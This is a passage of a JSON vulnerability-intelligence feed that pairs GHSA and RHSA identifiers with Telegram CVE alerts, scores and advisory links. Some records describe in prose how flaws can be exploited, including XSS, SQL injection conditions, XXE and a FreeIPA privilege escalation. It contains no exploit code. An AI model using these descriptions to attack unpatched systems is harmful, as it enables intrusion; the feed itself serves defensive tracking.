affected.\n\ud83d\udccf Published: 2024-02-19T12:58:48.620Z\n\ud83d\udccf Modified: 2025-06-12T15:37:51.979Z\n\ud83d\udd17 References:\n1. https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56\n2. https://www.enterprisedb.com/docs/security/assessments/cve-2024-1597/\n3. https://www.enterprisedb.com/docs/jdbc_connector/latest/01_jdbc_rel_notes/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TZQTSMESZD2RJ5XBPSXH3TIQVUW5DIUU/\n5. https://security.netapp.com/advisory/ntap-20240419-0008/\n6. http://www.openwall.com/lists/oss-security/2024/04/02/6\n7. https://lists.debian.org/debian-lts-announce/2024/05/msg00007.html", "creation_timestamp": "2025-06-12T16:34:43.000000Z"}, {"uuid": "b4cf72a9-cb66-46df-b93b-8423758aa4c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86XF-2MGP-GV3G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18218", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49576\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. The citizen-search-noresults-title and citizen-search-noresults-desc system messages are inserted into raw HTML, allowing anybody who can edit those messages to insert arbitrary HTML into the DOM. This vulnerability is fixed in 3.3.1.\n\ud83d\udccf Published: 2025-06-12T18:50:55.931Z\n\ud83d\udccf Modified: 2025-06-12T19:05:48.122Z\n\ud83d\udd17 References:\n1. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-86xf-2mgp-gv3g\n2. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/93c36ac778397e0e7c46cf7adb1e5d848265f1bd\n3. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/a0296afaedbe1a277337a2d8f1da83cb3a79b9ab", "creation_timestamp": "2025-06-12T19:33:49.000000Z"}, {"uuid": "9f5bf4e6-7684-4fbb-86b7-83286d5179f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85CJ-FWJH-FJV7", "type": "seen", "source": "Telegram/zADwex3kLz9IaLHw__x_MwQfRAPY0yfg2SR1HrZ5uE72Qmc", "content": "", "creation_timestamp": "2026-04-21T21:26:25.000000Z"}, {"uuid": "045b193f-5539-4a5a-aa15-cca2dafed2a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M7WR-2XF7-CM9P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18197", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-27289\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: pgx is a PostgreSQL driver and toolkit for Go. Prior to version 4.18.2, SQL injection can occur when all of the following conditions are met: the non-default simple protocol is used; a placeholder for a numeric value must be immediately preceded by a minus; there must be a second placeholder for a string value after the first placeholder; both must be on the same line; and both parameter values must be user-controlled. The problem is resolved in v4.18.2. As a workaround, do not use the simple protocol or do not place a minus directly before a placeholder.\n\n\ud83d\udccf Published: 2024-03-06T18:28:12.291Z\n\ud83d\udccf Modified: 2025-06-12T15:45:56.361Z\n\ud83d\udd17 References:\n1. https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p\n2. https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df", "creation_timestamp": "2025-06-12T16:34:39.000000Z"}, {"uuid": "1ed89f9f-ac1a-472e-a626-0a8e8ea25ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F494-4XF7-XJ35", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18232", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49589\n\ud83d\udd25 CVSS Score: 6.1 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: PCSX2 is a free and open-source PlayStation 2 (PS2) emulator. A stack-based buffer overflow exists in the Kprintf_HLE function of PCSX2 versions up to 2.3.414. Opening a disc image that logs a specially crafted message may allow a remote attacker to execute arbitrary code if the user enabled IOP Console Logging. This vulnerability is fixed in 2.3.414.\n\ud83d\udccf Published: 2025-06-12T20:56:38.711Z\n\ud83d\udccf Modified: 2025-06-12T20:56:38.711Z\n\ud83d\udd17 References:\n1. https://github.com/PCSX2/pcsx2/security/advisories/GHSA-f494-4xf7-xj35\n2. https://github.com/PCSX2/pcsx2/pull/12823\n3. https://github.com/PCSX2/pcsx2/pull/12826", "creation_timestamp": "2025-06-12T21:34:39.000000Z"}, {"uuid": "fbda2472-b8ac-4b64-afdc-83eda4a406a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2V3V-3WHP-953H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18217", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49578\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. Various date messages returned by `Language::userDate` are inserted into raw HTML, allowing anybody who can edit those messages to insert arbitrary HTML into the DOM. This impacts wikis where a group has the `editinterface` but not the `editsitejs` user right. This vulnerability is fixed in 3.3.1.\n\ud83d\udccf Published: 2025-06-12T18:50:49.300Z\n\ud83d\udccf Modified: 2025-06-12T19:12:17.575Z\n\ud83d\udd17 References:\n1. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-2v3v-3whp-953h\n2. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/64cb5d7ab3a6dc0381fae54b31e8fc4afadc8beb\n3. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/93c36ac778397e0e7c46cf7adb1e5d848265f1bd", "creation_timestamp": "2025-06-12T19:33:49.000000Z"}, {"uuid": "67baad31-9ab1-49fa-8e27-5a688d1eb64a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C2H-67QQ-VM87", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18221", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49575\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. Multiple system messages are inserted into the CommandPaletteFooter as raw HTML, allowing anybody who can edit those messages to insert arbitrary HTML into the DOM. This impacts wikis where a group has the `editinterface` but not the `editsitejs` user right. This vulnerability is fixed in 3.3.1.\n\ud83d\udccf Published: 2025-06-12T18:45:23.363Z\n\ud83d\udccf Modified: 2025-06-12T18:58:25.445Z\n\ud83d\udd17 References:\n1. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-4c2h-67qq-vm87\n2. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/4fa69e1d062dca7e407cc0530cf1da3e2baaf0b5\n3. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/93c36ac778397e0e7c46cf7adb1e5d848265f1bd", "creation_timestamp": "2025-06-12T19:33:55.000000Z"}, {"uuid": "f2eb5318-0ef6-4104-bbbc-a01e8ad532d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-826P-4GCG-35VW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17910", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30220\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)\n\ud83d\udd39 Description: GeoServer is an open source server that allows users to share and edit geospatial data. GeoTools Schema class use of Eclipse XSD library to represent schema data structure is vulnerable to XML External Entity (XXE) exploit. This impacts whoever exposes XML processing with gt-xsd-core involved in parsing, when the documents carry a reference to an external XML schema. The gt-xsd-core Schemas class is not using the EntityResolver provided by the ParserHandler (if any was configured). This also impacts users of gt-wfs-ng DataStore where the ENTITY_RESOLVER connection parameter was not being used as intended. This vulnerability is fixed in GeoTools 33.1, 32.3, 31.7, and 28.6.1, GeoServer 2.27.1, 2.26.3, and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13.\n\ud83d\udccf Published: 2025-06-10T15:16:39.339Z\n\ud83d\udccf Modified: 2025-06-10T15:16:39.339Z\n\ud83d\udd17 References:\n1. https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc\n2. https://github.com/geonetwork/core-geonetwork/security/advisories/GHSA-2p76-gc46-5fvc\n3. https://github.com/geotools/geotools/security/advisories/GHSA-826p-4gcg-35vw\n4. https://github.com/geonetwork/core-geonetwork/pull/8757\n5. https://github.com/geonetwork/core-geonetwork/pull/8803\n6. https://github.com/geonetwork/core-geonetwork/pull/8812\n7. https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities", "creation_timestamp": "2025-06-10T15:31:13.000000Z"}, {"uuid": "5069fd38-5ad7-4d48-9ef1-0fa2aedd115b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJW6-95H5-4JPX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17940", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49142\n\ud83d\udd25 CVSS Score: 6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:L)\n\ud83d\udd39 Description: Nautobot is a Network Source of Truth and Network Automation Platform. All users of Nautobot versions prior to 2.4.10 or prior to 1.6.32 are potentially affected. Due to insufficient security configuration of the Jinja2 templating feature used in computed fields, custom links, etc. in Nautobot, a malicious user could configure this feature set in ways that could expose the value of Secrets defined in Nautobot when the templated content is rendered or that could call Python APIs to modify data within Nautobot when the templated content is rendered, bypassing the object permissions assigned to the viewing user. Nautobot versions 1.6.32 and 2.4.10 will include fixes for the vulnerability. The vulnerability can be partially mitigated by configuring object permissions appropriately to limit certain actions to only trusted users.\n\ud83d\udccf Published: 2025-06-10T15:40:21.105Z\n\ud83d\udccf Modified: 2025-06-10T17:10:21.784Z\n\ud83d\udd17 References:\n1. https://github.com/nautobot/nautobot/security/advisories/GHSA-wjw6-95h5-4jpx\n2. https://github.com/nautobot/nautobot/pull/7417\n3. https://github.com/nautobot/nautobot/pull/7429\n4. https://docs.djangoproject.com/en/4.2/ref/templates/api/#alters-data-description\n5. https://jinja.palletsprojects.com/en/stable/sandbox", "creation_timestamp": "2025-06-10T17:32:32.000000Z"}, {"uuid": "b632afca-eb9a-4471-8eb7-15158d911c3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W2F5-6WCV-677R", "type": "published-proof-of-concept", "source": "Telegram/ul8xPPBt1TpPWUc6F08s489cG5Kpdb6-6jXrljeUyK6zBrY", "content": "", "creation_timestamp": "2026-04-21T19:25:31.000000Z"}, {"uuid": "3582e4ae-0d33-49c4-bbd9-1dae5cd6a6c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJXP-XRPV-XPFF", "type": "published-proof-of-concept", "source": "Telegram/ul8xPPBt1TpPWUc6F08s489cG5Kpdb6-6jXrljeUyK6zBrY", "content": "", "creation_timestamp": "2026-04-21T19:25:31.000000Z"}, {"uuid": "51a4e066-eb60-43b9-bc9f-1307c2e0f639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MMPF-RW6C-67MM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18077", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-48310\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)\n\ud83d\udd39 Description: TestingPlatform is a testing platform for Internet Security Standards. Prior to version 2.1.1, user input is not filtered correctly. Nmap options are accepted. In this particular case, the option to create log files is accepted in addition to a host name (and even without). A log file is created at the location specified. These files are created as root. If the file exists, the existing file is being rendered useless. This can result in denial of service. Additionally, input for scanning can be any CIDR blocks passed to nmap. An attacker can scan 0.0.0.0/0 or even local networks. Version 2.1.1 contains a patch for this issue.\n\ud83d\udccf Published: 2023-11-20T23:07:13.720Z\n\ud83d\udccf Modified: 2025-06-11T14:04:56.455Z\n\ud83d\udd17 References:\n1. https://github.com/NC3-LU/TestingPlatform/security/advisories/GHSA-9fhc-f3mr-w6h6\n2. https://github.com/NC3-LU/TestingPlatform/security/advisories/GHSA-mmpf-rw6c-67mm\n3. https://github.com/NC3-LU/TestingPlatform/commit/7b3e7ca869a4845aa7445f874c22c5929315c3a7\n4. https://github.com/NC3-LU/TestingPlatform/releases/tag/v2.1.1", "creation_timestamp": "2025-06-11T14:31:29.000000Z"}, {"uuid": "3408a665-bc62-4351-892b-e00af81731aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HMQM-33WP-858J", "type": "published-proof-of-concept", "source": "Telegram/ul8xPPBt1TpPWUc6F08s489cG5Kpdb6-6jXrljeUyK6zBrY", "content": "", "creation_timestamp": "2026-04-21T19:25:31.000000Z"}, {"uuid": "7cb301d7-c7d1-4207-bc7a-689781d494ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JH3-6JHV-2MGP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18600", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-21668\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: react-native-mmkv is a library that allows easy use of MMKV inside React Native applications. Before version 2.11.0, the react-native-mmkv logged the optional encryption key for the MMKV database into the Android system log. The key can be obtained by anyone with access to the Android Debugging Bridge (ADB) if it is enabled in the phone settings. This bug is not present on iOS devices. By logging the encryption secret to the system logs, attackers can trivially recover the secret by enabling ADB and undermining an app's thread model. This issue has been patched in version 2.11.0.\n\ud83d\udccf Published: 2024-01-09T19:05:49.332Z\n\ud83d\udccf Modified: 2025-06-17T14:26:17.894Z\n\ud83d\udd17 References:\n1. https://github.com/mrousavy/react-native-mmkv/security/advisories/GHSA-4jh3-6jhv-2mgp\n2. https://github.com/mrousavy/react-native-mmkv/commit/a8995ccb7184281f7d168bad3e9987c9bd05f00d\n3. https://github.com/mrousavy/react-native-mmkv/releases/tag/v2.11.0", "creation_timestamp": "2025-06-17T14:40:07.000000Z"}, {"uuid": "57c17bc1-276d-4bb3-97b5-b74648e28279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:4720", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18752", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4065\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in Red Hat AMQ Broker Operator, where it displayed a password defined in ActiveMQArtemisAddress CR, shown in plain text in the Operator Log. This flaw allows an authenticated local attacker to access information outside of their permissions.\n\ud83d\udccf Published: 2023-09-26T13:25:23.092Z\n\ud83d\udccf Modified: 2025-06-18T14:17:32.635Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:4720\n2. https://access.redhat.com/security/cve/CVE-2023-4065\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2224630", "creation_timestamp": "2025-06-18T14:41:56.000000Z"}, {"uuid": "150487cc-526d-4963-a201-969e556d9f15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4QQF-9M5C-W2C5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18542", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49134\n\ud83d\udd25 CVSS Score: 2.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N)\n\ud83d\udd39 Description: Weblate is a web based localization tool. Prior to version 5.12, the audit log notifications included the full IP address of the acting user. This could be obtained by third-party servers such as SMTP relays, or spam filters. This issue has been patched in version 5.12.\n\ud83d\udccf Published: 2025-06-16T21:03:31.982Z\n\ud83d\udccf Modified: 2025-06-16T21:03:31.982Z\n\ud83d\udd17 References:\n1. https://github.com/WeblateOrg/weblate/security/advisories/GHSA-4qqf-9m5c-w2c5\n2. https://github.com/WeblateOrg/weblate/pull/15102\n3. https://github.com/WeblateOrg/weblate/commit/020b2905e4d001cff2452574d10e6cf3621b5f62\n4. https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.12.1", "creation_timestamp": "2025-06-16T21:38:14.000000Z"}, {"uuid": "4aadfab2-fa52-426d-b9b1-3dfd5d798efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J35G-Q5MC-JWGP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18549", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48992\n\ud83d\udd25 CVSS Score: 5.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P)\n\ud83d\udd39 Description: Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.123 and 25.0.27, a stored and blind cross-site scripting (XSS) vulnerability exists in the Name Field of the user profile. A malicious attacker can change their name to a javascript payload, which is executed when a user adds the malicious user to their Synchronization &gt; Address books. This issue has been patched in versions  6.8.123 and 25.0.27.\n\ud83d\udccf Published: 2025-06-16T22:17:28.511Z\n\ud83d\udccf Modified: 2025-06-16T22:17:28.511Z\n\ud83d\udd17 References:\n1. https://github.com/Intermesh/groupoffice/security/advisories/GHSA-j35g-q5mc-jwgp\n2. https://github.com/Intermesh/groupoffice/commit/2e3695db9cdef1da7a9d754ff4d98f49f6924e2d", "creation_timestamp": "2025-06-16T22:40:43.000000Z"}, {"uuid": "9b9306ad-af52-4e3a-a6b9-6bc500fade82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9189", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18594", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4404\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A privilege escalation from host to domain vulnerability was found in the FreeIPA project. The FreeIPA package fails to validate the uniqueness of the `krbCanonicalName` for the admin account by default, allowing users to create services with the same canonical name as the REALM admin. When a successful attack happens, the user can retrieve a Kerberos ticket in the name of this service, containing the admin@REALM credential. This flaw allows an attacker to perform administrative tasks over the REALM, leading to access to sensitive data and sensitive data exfiltration.\n\ud83d\udccf Published: 2025-06-17T13:39:17.945Z\n\ud83d\udccf Modified: 2025-06-17T14:30:18.658Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9185\n2. https://access.redhat.com/errata/RHSA-2025:9187\n3. https://access.redhat.com/errata/RHSA-2025:9189\n4. https://access.redhat.com/errata/RHSA-2025:9193\n5. https://access.redhat.com/errata/RHSA-2025:9194\n6. https://access.redhat.com/security/cve/CVE-2025-4404\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2364606", "creation_timestamp": "2025-06-17T14:39:59.000000Z"}, {"uuid": "0ffdc969-8eb2-4699-bec1-62d94fc4d6bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5XJ-99CG-RCCM", "type": "seen", "source": "Telegram/FmTSSVQ1J3rSbvAltEePP9EbJsBmWNaUcXM1uvMHIpeiAtQ", "content": "", "creation_timestamp": "2026-04-21T21:26:51.000000Z"}, {"uuid": "edcae58a-20c0-49bf-a084-651d5cfb6173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F9XF-VC72-RCGM", "type": "seen", "source": "Telegram/FmTSSVQ1J3rSbvAltEePP9EbJsBmWNaUcXM1uvMHIpeiAtQ", "content": "", "creation_timestamp": "2026-04-21T21:26:51.000000Z"}, {"uuid": "21d6c4e0-0009-48ca-a477-9d0d2413ebb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8FQ-WRFM-CJ2Q", "type": "seen", "source": "Telegram/FmTSSVQ1J3rSbvAltEePP9EbJsBmWNaUcXM1uvMHIpeiAtQ", "content": "", "creation_timestamp": "2026-04-21T21:26:51.000000Z"}, {"uuid": "8b587f27-85ba-452d-a4be-f085f5c2c0ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GHMH-Q25G-GXXX", "type": "seen", "source": "Telegram/FmTSSVQ1J3rSbvAltEePP9EbJsBmWNaUcXM1uvMHIpeiAtQ", "content": "", "creation_timestamp": "2026-04-21T21:26:51.000000Z"}, {"uuid": "b9bf0a26-2281-44f2-8f30-4d6e96ef9799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2XJC-RG88-JVPP", "type": "seen", "source": "Telegram/FmTSSVQ1J3rSbvAltEePP9EbJsBmWNaUcXM1uvMHIpeiAtQ", "content": "", "creation_timestamp": "2026-04-21T21:26:51.000000Z"}, {"uuid": "1af635ff-7fb3-477d-b9f9-550a653d1f3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7050", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18474", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12747\n\ud83d\udd25 CVSS Score: 5.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation.\n\ud83d\udccf Published: 2025-01-14T17:39:16.031Z\n\ud83d\udccf Modified: 2025-06-16T17:24:34.857Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2600\n2. https://access.redhat.com/errata/RHSA-2025:7050\n3. https://access.redhat.com/errata/RHSA-2025:8385\n4. https://access.redhat.com/security/cve/CVE-2024-12747\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2332968\n6. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-06-16T17:37:46.000000Z"}, {"uuid": "92f7ec9f-c081-4f97-a55e-704743b3825e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVJ8-PH7X-65GF", "type": "seen", "source": "Telegram/F2G63fMNgyZcc0oNt6XGHExAkvTr9kUyS9C9Ki-AIDnnQ5g", "content": "", "creation_timestamp": "2026-04-21T21:27:12.000000Z"}, {"uuid": "45b1866c-dd1d-4b24-84a8-c9f49bee89be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H6H-7RC9-3824", "type": "seen", "source": "Telegram/F2G63fMNgyZcc0oNt6XGHExAkvTr9kUyS9C9Ki-AIDnnQ5g", "content": "", "creation_timestamp": "2026-04-21T21:27:12.000000Z"}, {"uuid": "bb1f61ff-7601-48c9-97b8-d2010029ac9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PP3-53P2-WW9V", "type": "published-proof-of-concept", "source": "Telegram/PLPaRbcJDaPiLP6CzuoYpp_an71AlFD-MBdwXLbLZgMJCSE", "content": "", "creation_timestamp": "2026-04-21T21:27:33.000000Z"}, {"uuid": "aeceafb4-d10a-4c8d-add8-546d1c0cb408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:6990", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18456", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45774\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. A specially crafted JPEG file can cause the JPEG parser of grub2 to incorrectly check the bounds of its internal buffers, resulting in an out-of-bounds write. The possibility of overwriting sensitive information to bypass secure boot protections is not discarded.\n\ud83d\udccf Published: 2025-02-18T18:25:09.511Z\n\ud83d\udccf Modified: 2025-06-16T14:08:16.051Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:6990\n2. https://access.redhat.com/security/cve/CVE-2024-45774\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2337461\n4. https://lists.gnu.org/archive/html/grub-devel/2025-02/msg00024.html", "creation_timestamp": "2025-06-16T14:38:11.000000Z"}, {"uuid": "94b85fc9-1dd1-4c46-b81c-2823f3d5b376", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6337", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18576", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7923\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An authentication bypass vulnerability has been identified in Pulpcore when deployed with Gunicorn versions prior to 22.0, due to the puppet-pulpcore 